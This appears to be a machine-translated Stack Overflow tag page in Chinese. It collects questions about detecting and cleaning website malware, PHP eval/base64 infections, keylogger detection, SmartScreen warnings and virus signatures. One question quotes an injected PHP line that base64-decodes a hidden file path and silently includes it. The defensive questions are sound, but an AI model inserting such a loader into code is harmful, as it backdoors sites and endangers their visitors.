问题标签 [malware-detection]
For questions regarding programming in ECMAScript (JavaScript/JS) and its various dialects/implementations (excluding ActionScript). Note JavaScript is NOT the same as Java! Please include all relevant tags on your question; e.g., [node.js], [jquery], [json], [reactjs], [angular], [ember.js], [vue.js], [typescript], [svelte], etc.
php - 如何摆脱 eval-base64_decode 之类的 PHP 病毒文件?
我的网站(非常大的社区网站)最近感染了病毒。每个index.php
文件都已更改,因此这些文件的开始 php 标记已更改为以下行:
当我对此进行解码时,它产生了以下 PHP 代码:
我已经尝试了几种方法来清除病毒,甚至从备份中恢复,并且文件在几分钟或几小时后被重新感染。那么你能帮帮我吗?
你对这种病毒了解多少?
是否存在用于安装和传播的已知安全漏洞?
上面的 php 代码实际上做了什么?
它嵌入到 iframe 中的页面有什么作用?
当然更重要的是:我能做些什么来摆脱它?
请帮忙,我们几乎没有想法和希望:(
UPDATE1 更多细节:奇怪的是:当我们第一次检查受感染的文件时。它们已更改,但在某些情况下,它们在 ftp 程序中的修改时间显示上次访问是几天、几个月甚至几年前!这怎么可能?它让我疯狂!
更新 2 我认为问题是在用户在他的 Wordpress 安装中安装插件后引发的。从备份恢复并完全删除 Wordpress 文件夹和关联的数据库后,问题似乎消失了。我们目前订阅了一项安全服务,他们正在调查这个问题,以确保黑客永远消失。感谢任何回复的人。
php - 用于搜索特定代码的代码 目录和子目录中的任何文件
好的,我对 php 很陌生,但我知道它可以读取目录和文件。
我一直在我们的一个站点上与恶意软件问题作斗争,我需要编写一个脚本来在我的主机空间上搜索它。
黑客在文件中放入的代码是
*/ $DUOIEK = base64_decode("L2hvbWUvdXNlcnMvd2ViL2IxNjQzL3NsLnRoZWNoZXNzL3B1YmxpY19odG1sL01lZGNvdXJ0QmFja3Vwb2N0MjAwNy9NZWRjb3VydEJhY2t1cG9jdDIwMDctMi9iMmIgY3VzdG9tZXIvQnViYmxlcG9zdCBCYWNrIHVwL3B1YmxpY19odG1sL0JhY2t1cHMvTWVkaWFzdWZhY2UgMjAwNS9IZWxwIGFuZCBkb2N1bWVudGF0aW9uL2phdmEgYXBpL0phdmFBUEkvY29tL21lZGlhc3VyZmFjZS9kYXRhdHlwZXMvc2VhcmNoaW5nL2NsYXNzLXVzZS90c2Rlby5waHA="); @include_once $DUOIEK;/* */?>
我不知道这是什么,但是当它出现时,谷歌会阻止我的网站。
我必须下载所有文件然后在dreamweaver中搜索它用空格替换这个废话并将它放回去。
我需要一个脚本来在谷歌之前检测到这一点。
如果有人可以给我一些指示,那就太好了
我相信这是每个人现在或以后都会面临的问题。
web - 我的网站包含恶意软件
警告:这里有些不对劲!www.mywebsite.com 包含恶意软件。如果您访问此站点,您的计算机可能会感染病毒。如果您继续,Google 发现恶意软件可能会安装到您的计算机上。如果您过去曾访问过此站点或您信任此站点,则它可能最近刚刚被黑客入侵。你不应该继续,也许明天再试一次或去别的地方。我们已经通知 www.mywebsite.com 我们在该网站上发现了恶意软件。有关在 www.mywebsite.com 上发现的问题的更多信息,请访问 Google 安全浏览诊断页面。
如果您了解访问本网站可能会损害您的计算机,请继续。
我们的一个网站现已关闭,看起来像这样。这是什么原因?请帮忙。
keylogger - 有没有办法检测密钥记录软件?
我可能会编写一个程序来检测恶意(或非恶意)软件,即按键记录(记录按键以获取信息)。
- 会使用什么战术?
- 是否有特定的代码要查找?
- 我应该搜索某些位置吗?
- 我更喜欢 Java 或 Perl,因为我精通这些语言
- 这些语言会起作用吗?
- 有没有更好的语言可以用于这种情况?
- 会用什么?
- 代码?
- 算法?
- 功能?
windows - IE9 SmartScreen 警告,尽管遵循所有建议
我们提供可从我们的网站以 InstallShield EXE 形式下载的 Windows 程序。
当运行 IE9 的人尝试下载并运行我们的软件时,他们会在屏幕底部看到以下消息:
它建议:
- 使用 Authenticode 签名对您的程序进行数字签名。
- 确保下载不会被检测为恶意软件。
- 申请 Windows 徽标。
我们已经完成了所有三件事。我们的EXE是用authenticode签名进行数字签名的(警告信息上方的条是橙色的,不是红色的,表示IE9识别并验证了签名)。我们尝试过的任何防病毒程序都不会将我们的下载检测为恶意软件。我们已经申请并收到了一个Windows Logo。
到目前为止,我们的大多数客户都没有使用 IE 9。但这对那些使用 IE 9 的人来说非常麻烦。对此我们还能做些什么,还是我们只需要等到大量客户下载此软件后,此消息才会消失?
(这是否意味着当我们发布新版本时,所有 IE 9 用户都会再次收到此消息,直到有足够多的用户下载它?)
2011-06-14 更新:
谢谢,@EricLaw-MSFT。URL 是http://dakim.dakiminc.netdna-cdn.com/DakimBrainFitness.exe。(可在http://www.dakim.com上的“下载免费试用版”按钮上找到。)
我们只在短时间内提供可下载的试用版。我们的主要分发方法是安装 DVD。
multithreading - 这个程序中的哪个可以是多线程的?
我是普通用户,没有很强的编程背景。
我有一台 64 位双核机器(Dell Vostro 3400),我想我可以用这台机器运行多线程程序(是吗?)
我认为可以转换为多线程程序的程序是这样的:
http://code.google.com/p/malwarecookbook/source/browse/trunk/3/8/pescanner.py
有可能这样做吗?如果是,应该编辑哪个部分才能正常工作?
谢谢。
php - PHP:检测哪个脚本正在调用 header();
我正在尝试查找导致网站重定向的恶意软件。很可能它正在使用 header("location: ...") 所以我想知道有没有办法确定哪个脚本文件正在调用 header()
任何帮助表示赞赏
python - 用于检测恶意软件网站的 Python 脚本或用于检测网站上的恶意软件的程序?
我很想知道恶意软件检测(如谷歌的安全浏览)技术是如何工作的?谷歌搜索对我的事业没有帮助。我发现了一些叫做cuckoobox的东西,它可以做这样的事情。
网站的恶意软件检测究竟是如何工作的?那可能是什么算法?谷歌安全浏览等使用什么算法?
任何可用的python脚本?
wordpress - Wordpress 安全恶意软件
我的 wordpress 一直运行良好(它已更新),然后今天早上我收到了来自谷歌的关于访问我的网站的警告。当我点击详细信息时,我收到以下消息。我一起去禁用了我的评论。删除了我认为可能导致它的插件。我不确定还能做什么。我现在需要帮助吗?感谢您花时间听取我的案子!
Google 访问该网站时发生了什么?在过去 90 天内我们在网站上测试的 7 个页面中,有 7 个页面导致恶意软件在未经用户同意的情况下被下载和安装。Google 上一次访问该站点是在 2012-03-07,最后一次在该站点上发现可疑内容是在 2012-03-07。恶意软件托管在 1 个域上,包括 happynewyear.osa.pl/。
该站点托管在 1 个网络上,包括 AS29873 (BIZLAND)。
antivirus - 病毒签名的最小长度
我在任何地方都没有找到这方面的信息。病毒签名是否有最低要求的长度?我在 Peter Szor 的书中读到,对于 16 位应用程序,16 个字节甚至足以避免误报。32 位和 64 位应用程序是否也有同等的最低要求?
谢谢。